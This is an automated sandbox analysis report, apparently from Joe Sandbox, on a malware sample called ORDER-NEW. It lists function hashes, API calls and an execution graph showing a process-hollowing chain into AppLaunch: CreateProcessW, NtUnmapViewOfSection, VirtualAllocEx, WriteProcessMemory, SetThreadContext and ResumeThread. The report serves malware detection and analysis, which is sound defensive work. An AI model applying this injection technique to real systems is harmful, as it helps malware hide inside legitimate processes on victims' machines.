                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                        • Opcode ID: 24285ea3bb2d7dfe8212642abc082fa2e0fc3ba63a817021e8fc6b2f195221f3
                                                                                                                                                                        • Instruction ID: e8fbeaf73f9ceb98a6d5962a7d72d89af9bc5869283ef43f9855d71b174a2b15
                                                                                                                                                                        • Opcode Fuzzy Hash: 24285ea3bb2d7dfe8212642abc082fa2e0fc3ba63a817021e8fc6b2f195221f3
                                                                                                                                                                        • Instruction Fuzzy Hash: 3C219F71910349CFDB20CF99D5457DAFBF8EF58324F14481EE946A3600D7B9A544CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0121AB52 Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 277 121ab52-121abca 281 121abd2-121abfd DeleteFileW 277->281 282 121abcc-121abcf 277->282 283 121ac06-121ac2e 281->283 284 121abff-121ac05 281->284 282->281 284->283
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 0121ABF0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DeleteFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4033686569-0
                                                                                                                                                                        • Opcode ID: c87a26b8af3a99916fceb44ea0d1b1fe09b7ef1fe3f8cb7035863c7620a5c14c
                                                                                                                                                                        • Instruction ID: 66b1a44c627b2441df0166b243b3572aba838b85f7a344167ea91a2aaa602f67
                                                                                                                                                                        • Opcode Fuzzy Hash: c87a26b8af3a99916fceb44ea0d1b1fe09b7ef1fe3f8cb7035863c7620a5c14c
                                                                                                                                                                        • Instruction Fuzzy Hash: A0219AB2C0529A8FCB10CFA9C540BDEBFF4FF59220F09856AD844A7241D738A945CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 01210D99 Relevance: 1.6, APIs: 1, Instructions: 63memoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 287 1210d99-1210e21 VirtualProtect 291 1210e23-1210e29 287->291 292 1210e2a-1210e5a 287->292 291->292
                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 01210E14
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                        • Opcode ID: d8cd09dcc974fe72019010584f7330c4cce077aca80241c07b312659dea3d9e7
                                                                                                                                                                        • Instruction ID: ecd69296e39396f0b7da8a66668225ae9d6e2259a8aa6120c26a89e251bf1597
                                                                                                                                                                        • Opcode Fuzzy Hash: d8cd09dcc974fe72019010584f7330c4cce077aca80241c07b312659dea3d9e7
                                                                                                                                                                        • Instruction Fuzzy Hash: AA2118718003499FCB10CFAAC4447EEBBF9FF58224F54882ED559A7240D7799A45DFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 012165B8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 296 12165b8 297 12165bd-1216654 DuplicateHandle 296->297 298 1216656-121665c 297->298 299 121665d-121667a 297->299 298->299
                                                                                                                                                                        APIs
                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01216647
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                        • Opcode ID: 00f2eb0526bf712416adfcdd95649cb14ffefd77694a9621eeb0bd565cfd02e0
                                                                                                                                                                        • Instruction ID: 90361f260bf5138564ffded640c634cb2a4c5ec0543bfd077babbfab88737e4d
                                                                                                                                                                        • Opcode Fuzzy Hash: 00f2eb0526bf712416adfcdd95649cb14ffefd77694a9621eeb0bd565cfd02e0
                                                                                                                                                                        • Instruction Fuzzy Hash: 7F21E4B5D00249DFDB10CFAAD584ADEBBF8FB58320F14842AE914A3350D378A954CF60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 012165C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 302 12165c0-1216654 DuplicateHandle 303 1216656-121665c 302->303 304 121665d-121667a 302->304 303->304
                                                                                                                                                                        APIs
                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01216647
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                        • Opcode ID: 687ee5af0abd7b62e541bc763369e07961a9f3d852aa0ca32b202c0b93d29d2d
                                                                                                                                                                        • Instruction ID: 53205f143dc90c20235c9c232cf64efd5a5faf3aa96b083bbbcd590809b2a056
                                                                                                                                                                        • Opcode Fuzzy Hash: 687ee5af0abd7b62e541bc763369e07961a9f3d852aa0ca32b202c0b93d29d2d
                                                                                                                                                                        • Instruction Fuzzy Hash: C121E4B5900249DFDB10CF9AD884ADEBBF8FB58320F14842AE914A3350D378A944CFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 01210DA0 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 307 1210da0-1210e21 VirtualProtect 310 1210e23-1210e29 307->310 311 1210e2a-1210e5a 307->311 310->311
                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 01210E14
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                        • Opcode ID: 5391f3015c1e798933f4d70d9f72550ef2d9e4cb48aabe5be23b1062d7d97249
                                                                                                                                                                        • Instruction ID: aede4edee26ba0b539522f91c3a76f614cee263f5d897cb31fee8c7e507dbafb
                                                                                                                                                                        • Opcode Fuzzy Hash: 5391f3015c1e798933f4d70d9f72550ef2d9e4cb48aabe5be23b1062d7d97249
                                                                                                                                                                        • Instruction Fuzzy Hash: C92115718002098FCB10CFAAC484BEEBBF9FF58224F54882AD519A7240D7799945CFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0121AB80 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 0121ABF0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DeleteFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4033686569-0
                                                                                                                                                                        • Opcode ID: ca0e5f1f0d8a11569f97d0faf6b5b62dc9888a248ca0fabec8ec9d49865a908d
                                                                                                                                                                        • Instruction ID: 317e3dac64da81b0f8f643af95a2afa0bf5b7f7d6931073fc70c1ea8bf800cb0
                                                                                                                                                                        • Opcode Fuzzy Hash: ca0e5f1f0d8a11569f97d0faf6b5b62dc9888a248ca0fabec8ec9d49865a908d
                                                                                                                                                                        • Instruction Fuzzy Hash: 611136B1C0065A8BCB10CF9AC5447EEFBF4FF58324F14852AD918A7240D738AA44CFA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 01216C24 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 01217365
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                        • Opcode ID: 89a781481097ca3dba0ee39e8897f5677586cf9908f63056ee3cd4b2676c4557
                                                                                                                                                                        • Instruction ID: 72eb59b2c53fd983f6ec59502e1ae1c48f579f2e85fb8b92f5bac5a2a19014a2
                                                                                                                                                                        • Opcode Fuzzy Hash: 89a781481097ca3dba0ee39e8897f5677586cf9908f63056ee3cd4b2676c4557
                                                                                                                                                                        • Instruction Fuzzy Hash: 0611F2B19002498FCB10CF99D485BDEBBF8EB58224F14882AE919A7300D379A944CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 01217F30 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetProcessWorkingSetSize.KERNEL32(?,?,?), ref: 01217F95
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProcessSizeWorking
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3584180929-0
                                                                                                                                                                        • Opcode ID: 716c8c867768acabfb7131c552ebfe2e3059afe9f57b6d93127a49521780d13e
                                                                                                                                                                        • Instruction ID: 39ff5259accd9f9931bb87cb39e77fa2374f1611a88698ad93a2e2c54b1e0454
                                                                                                                                                                        • Opcode Fuzzy Hash: 716c8c867768acabfb7131c552ebfe2e3059afe9f57b6d93127a49521780d13e
                                                                                                                                                                        • Instruction Fuzzy Hash: 7C11F2B19002498FCB10CF9AD884BDEBBF8EB88324F108829E519A7240D375A944CFA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 008A4762 Relevance: .8, Instructions: 777COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.729565047.00000000007F2000.00000040.00020000.sdmp, Offset: 007F0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.729557574.00000000007F0000.00000002.00020000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.729763591.00000000008A6000.00000002.00020000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7f0000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d05699cd0b703cc66974899fdfd70e8da199590175fe951099f4fd6dc5d0ecf0
                                                                                                                                                                        • Instruction ID: 3b24283a0b19096dd18f23107c5ea5d3d1c44586a5728ad64e752602fdc1c630
                                                                                                                                                                        • Opcode Fuzzy Hash: d05699cd0b703cc66974899fdfd70e8da199590175fe951099f4fd6dc5d0ecf0
                                                                                                                                                                        • Instruction Fuzzy Hash: C452FE6640F3D19FDB238B748CA5691BFB0EE5321471E46DBC4C1CF4A7E269684AC722
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 012173B0 Relevance: .3, Instructions: 315COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 32573924bc2b216daea95fd380ac440766ce3743dec34dae957f8cd72ccd9ffa
                                                                                                                                                                        • Instruction ID: 9a0fa1966b0039a458054703402a59b60713814ebbd0b7385cbbe8d385ee92db
                                                                                                                                                                        • Opcode Fuzzy Hash: 32573924bc2b216daea95fd380ac440766ce3743dec34dae957f8cd72ccd9ffa
                                                                                                                                                                        • Instruction Fuzzy Hash: 6112A3B0C857668BE310CF66E9493853BA1B74572CF604B08D2693B2E1D7B9D1EACF44
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 012173A2 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e62698c02ebd5d1e5c6f51bf6ba537d9399ba10e0d47eb6de49be91c596d6368
                                                                                                                                                                        • Instruction ID: 359046e26a346cfed6c6cac52983049b79d5ea7a04d6ff3dce552b392552a066
                                                                                                                                                                        • Opcode Fuzzy Hash: e62698c02ebd5d1e5c6f51bf6ba537d9399ba10e0d47eb6de49be91c596d6368
                                                                                                                                                                        • Instruction Fuzzy Hash: 7AC108B1C917658BD710CF66E8493893BA1BB85328F204B08D2697B2E1D7B9D0E6CF44
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:20.1%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                        Signature Coverage:0.9%
                                                                                                                                                                        Total number of Nodes:222
                                                                                                                                                                        Total number of Limit Nodes:36
                                                                                                                                                                        execution_graph 22864 53dd01c 22865 53dd030 22864->22865 22866 53dd07e 22865->22866 22869 5436971 22865->22869 22874 5436978 22865->22874 22870 543699a 22869->22870 22879 5436a10 22870->22879 22883 5436a18 22870->22883 22871 54369b8 22871->22871 22875 543699a 22874->22875 22877 5436a10 EnumResourceNamesW 22875->22877 22878 5436a18 EnumResourceNamesW 22875->22878 22876 54369b8 22876->22876 22877->22876 22878->22876 22880 5436a18 22879->22880 22887 543662c 22880->22887 22884 5436a2c 22883->22884 22885 543662c EnumResourceNamesW 22884->22885 22886 5436a56 22885->22886 22886->22871 22888 5436a70 EnumResourceNamesW 22887->22888 22890 5436a56 22888->22890 22890->22871 22851 9c30040 22852 9c3005e 22851->22852 22856 9c31b60 22852->22856 22860 9c31b54 22852->22860 22853 9c30095 22858 9c31bb9 LoadLibraryA 22856->22858 22859 9c31c5f 22858->22859 22862 9c31bb9 LoadLibraryA 22860->22862 22863 9c31c5f 22862->22863 22891 9c3e8a0 DuplicateHandle 22892 9c3e93c 22891->22892 22893 54368a0 22894 54368e4 EnumResourceTypesW 22893->22894 22896 543692d 22894->22896 22897 54356a0 22899 54356bb 22897->22899 22898 5435810 22899->22898 22901 9e30448 22899->22901 22903 9e3045a 22901->22903 22902 9e30597 22902->22899 22903->22902 22905 9e305c9 22903->22905 22906 9e305f8 22905->22906 22911 9e308f6 22906->22911 22915 9e30778 22906->22915 22919 9e30768 22906->22919 22907 9e30620 22907->22903 22913 9e307a8 22911->22913 22912 9e309c8 22912->22907 22913->22912 22923 9e30bd0 22913->22923 22917 9e307a8 22915->22917 22916 9e309c8 22916->22907 22917->22916 22918 9e30bd0 4 API calls 22917->22918 22918->22917 22921 9e307a8 22919->22921 22920 9e309c8 22920->22907 22921->22920 22922 9e30bd0 4 API calls 22921->22922 22922->22921 22924 9e30bf6 22923->22924 22928 9e30c85 22924->22928 22956 9e30d38 22924->22956 22925 9e30c34 22925->22913 22929 9e30d06 22928->22929 22947 9e30c66 22928->22947 22929->22925 22947->22929 22985 9e31362 22947->22985 22989 9e3155c VirtualAllocEx 22947->22989 22991 9e314dd 22947->22991 22995 9e30e98 22947->22995 22999 9e31398 NtUnmapViewOfSection 22947->22999 23001 9e3125a 22947->23001 23005 9e3145b 22947->23005 23009 9e315db 22947->23009 23013 9e3169b ResumeThread 22947->23013 23015 9e31415 22947->23015 23019 9e31295 22947->23019 23023 9e312d5 22947->23023 23027 9e31115 22947->23027 23031 9e31056 22947->23031 23035 9e31489 22947->23035 23039 9e3180a 22947->23039 23043 9e3170b 22947->23043 23047 9e31884 22947->23047 23051 9e311c6 22947->23051 23055 9e31134 22947->23055 23059 9e31174 22947->23059 23063 9e31536 22947->23063 23067 9e31836 22947->23067 23071 9e30ea8 22947->23071 23075 9e31667 22947->23075 22957 9e30d46 22956->22957 22959 9e30c66 22956->22959 22958 9e30d06 22958->22925 22959->22958 22960 9e31362 CreateProcessW 22959->22960 22961 9e31667 CreateProcessW 22959->22961 22962 9e30ea8 CreateProcessW 22959->22962 22963 9e31836 CreateProcessW 22959->22963 22964 9e31536 CreateProcessW 22959->22964 22965 9e31174 CreateProcessW 22959->22965 22966 9e31134 CreateProcessW 22959->22966 22967 9e311c6 CreateProcessW 22959->22967 22968 9e31884 CreateProcessW 22959->22968 22969 9e3170b CreateProcessW 22959->22969 22970 9e3180a CreateProcessW 22959->22970 22971 9e31489 CreateProcessW 22959->22971 22972 9e31056 CreateProcessW 22959->22972 22973 9e31115 CreateProcessW 22959->22973 22974 9e312d5 CreateProcessW 22959->22974 22975 9e31295 CreateProcessW 22959->22975 22976 9e31415 CreateProcessW 22959->22976 22977 9e3169b ResumeThread 22959->22977 22978 9e315db CreateProcessW 22959->22978 22979 9e3145b CreateProcessW 22959->22979 22980 9e3125a CreateProcessW 22959->22980 22981 9e31398 NtUnmapViewOfSection 22959->22981 22982 9e30e98 CreateProcessW 22959->22982 22983 9e314dd CreateProcessW 22959->22983 22984 9e3155c VirtualAllocEx 22959->22984 22960->22959 22961->22959 22962->22959 22963->22959 22964->22959 22965->22959 22966->22959 22967->22959 22968->22959 22969->22959 22970->22959 22971->22959 22972->22959 22973->22959 22974->22959 22975->22959 22976->22959 22977->22959 22978->22959 22979->22959 22980->22959 22981->22959 22982->22959 22983->22959 22984->22959 22986 9e30f45 22985->22986 22988 9e318ba 22986->22988 23079 9e3033c 22986->23079 22988->22947 22990 9e315b8 22989->22990 22993 9e30f45 22991->22993 22992 9e3033c CreateProcessW 22992->22993 22993->22992 22994 9e318ba 22993->22994 22994->22947 22996 9e30ea8 22995->22996 22997 9e318ba 22996->22997 22998 9e3033c CreateProcessW 22996->22998 22997->22947 22998->22996 23000 9e313e7 22999->23000 23003 9e30f45 23001->23003 23002 9e3033c CreateProcessW 23002->23003 23003->23002 23004 9e318ba 23003->23004 23004->22947 23006 9e30f45 23005->23006 23007 9e318ba 23006->23007 23008 9e3033c CreateProcessW 23006->23008 23007->22947 23008->23006 23011 9e30f45 23009->23011 23010 9e3033c CreateProcessW 23010->23011 23011->23010 23012 9e318ba 23011->23012 23012->22947 23014 9e316e4 23013->23014 23014->23014 23016 9e30f45 23015->23016 23017 9e3033c CreateProcessW 23016->23017 23018 9e318ba 23016->23018 23017->23016 23018->22947 23021 9e30f45 23019->23021 23020 9e3033c CreateProcessW 23020->23021 23021->23020 23022 9e318ba 23021->23022 23022->22947 23024 9e30f45 23023->23024 23025 9e3033c CreateProcessW 23024->23025 23026 9e318ba 23024->23026 23025->23024 23026->22947 23028 9e30f45 23027->23028 23029 9e3033c CreateProcessW 23028->23029 23030 9e318ba 23028->23030 23029->23028 23030->22947 23033 9e30f45 23031->23033 23032 9e3033c CreateProcessW 23032->23033 23033->23032 23034 9e318ba 23033->23034 23034->22947 23037 9e30f45 23035->23037 23036 9e3033c CreateProcessW 23036->23037 23037->23036 23038 9e318ba 23037->23038 23038->22947 23042 9e30f45 23039->23042 23040 9e318ba 23040->22947 23041 9e3033c CreateProcessW 23041->23042 23042->23040 23042->23041 23044 9e30f45 23043->23044 23045 9e318ba 23044->23045 23046 9e3033c CreateProcessW 23044->23046 23045->22947 23046->23044 23050 9e30f45 23047->23050 23048 9e3033c CreateProcessW 23048->23050 23049 9e318ba 23049->22947 23050->23048 23050->23049 23052 9e30f45 23051->23052 23053 9e3033c CreateProcessW 23052->23053 23054 9e318ba 23052->23054 23053->23052 23054->22947 23057 9e30f45 23055->23057 23056 9e3033c CreateProcessW 23056->23057 23057->23056 23058 9e318ba 23057->23058 23058->22947 23060 9e30f45 23059->23060 23061 9e3033c CreateProcessW 23060->23061 23062 9e318ba 23060->23062 23061->23060 23062->22947 23064 9e30f45 23063->23064 23065 9e3033c CreateProcessW 23064->23065 23066 9e318ba 23064->23066 23065->23064 23066->22947 23069 9e30f45 23067->23069 23068 9e318ba 23068->22947 23069->23068 23070 9e3033c CreateProcessW 23069->23070 23070->23069 23072 9e30f27 23071->23072 23073 9e318ba 23072->23073 23074 9e3033c CreateProcessW 23072->23074 23073->22947 23074->23072 23077 9e30f45 23075->23077 23076 9e3033c CreateProcessW 23076->23077 23077->23076 23078 9e318ba 23077->23078 23078->22947 23080 9e31c20 CreateProcessW 23079->23080 23082 9e31d82 23080->23082 23108 9e32010 23109 9e32060 WriteProcessMemory 23108->23109 23110 9e32058 23108->23110 23111 9e320a1 23109->23111 23110->23109 23083 53dd1d4 23084 53dd1ec 23083->23084 23085 53dd246 23084->23085 23087 9c3b05c 23084->23087 23088 9c3b067 23087->23088 23089 9c3f521 23088->23089 23091 9c3f511 23088->23091 23098 9c3e404 23089->23098 23094 9c3f648 23091->23094 23092 9c3f51f 23095 9c3f660 23094->23095 23096 9c3f743 23095->23096 23097 9c3e404 CallWindowProcW 23095->23097 23096->23092 23097->23095 23099 9c3e40f 23098->23099 23100 9c3f822 CallWindowProcW 23099->23100 23101 9c3f7d1 23099->23101 23100->23101 23101->23092 23102 9e31f48 ReadProcessMemory 23103 9e31fce 23102->23103 23104 9e31e88 23105 9e31ed4 SetThreadContext 23104->23105 23106 9e31eca 23104->23106 23107 9e31f08 23105->23107 23106->23105 23112 9c3ccb8 23113 9c3cd20 CreateWindowExW 23112->23113 23115 9c3cde2 23113->23115 23116 9c3e678 GetCurrentProcess 23117 9c3e6f2 GetCurrentThread 23116->23117 23120 9c3e6eb 23116->23120 23118 9c3e728 23117->23118 23119 9c3e72f GetCurrentProcess 23117->23119 23118->23119 23123 9c3e765 23119->23123 23120->23117 23121 9c3e78d GetCurrentThreadId 23122 9c3e7be 23121->23122 23123->23121

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 09E31398 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26nativeCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1535 9e31398-9e313e5 NtUnmapViewOfSection 1536 9e313e7-9e313ed 1535->1536 1537 9e313ee-9e313fa 1535->1537 1536->1537 1538 9e31403 1537->1538 1539 9e313fc-9e31401 1537->1539 1540 9e31408-9e3140e 1538->1540 1539->1540
                                                                                                                                                                        APIs
                                                                                                                                                                        • NtUnmapViewOfSection.NTDLL ref: 09E313C5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.934046378.0000000009E30000.00000040.00000010.sdmp, Offset: 09E30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9e30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: SectionUnmapView
                                                                                                                                                                        • String ID: y4i$
                                                                                                                                                                        • API String ID: 498011366-2620213625
                                                                                                                                                                        • Opcode ID: 76a945460697f744814124315efa1f2403c1cc038fd6ad5fd2d44e95386ca0f9
                                                                                                                                                                        • Instruction ID: d14a9c79301e3acd97af7b34982954d40db03380c7407edf2665206eafb7ddb0
                                                                                                                                                                        • Opcode Fuzzy Hash: 76a945460697f744814124315efa1f2403c1cc038fd6ad5fd2d44e95386ca0f9
                                                                                                                                                                        • Instruction Fuzzy Hash: 94F04970908269CFDF208B54C9887C9BBB1BB24348F54D4DED48AA7251D7B58EC5CF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 09C3E678 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1142 9c3e678-9c3e6e9 GetCurrentProcess 1143 9c3e6f2-9c3e726 GetCurrentThread 1142->1143 1144 9c3e6eb-9c3e6f1 1142->1144 1145 9c3e728-9c3e72e 1143->1145 1146 9c3e72f-9c3e763 GetCurrentProcess 1143->1146 1144->1143 1145->1146 1148 9c3e765-9c3e76b 1146->1148 1149 9c3e76c-9c3e787 call 9c3e828 1146->1149 1148->1149 1152 9c3e78d-9c3e7bc GetCurrentThreadId 1149->1152 1153 9c3e7c5-9c3e827 1152->1153 1154 9c3e7be-9c3e7c4 1152->1154 1154->1153
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 09C3E6D8
                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 09C3E715
                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 09C3E752
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 09C3E7AB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.933882138.0000000009C30000.00000040.00000001.sdmp, Offset: 09C30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9c30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                                        • Opcode ID: 44f840e6b7ebe504703a3962e267d3160e44ba091416e2fa38299e3aa92f3bb4
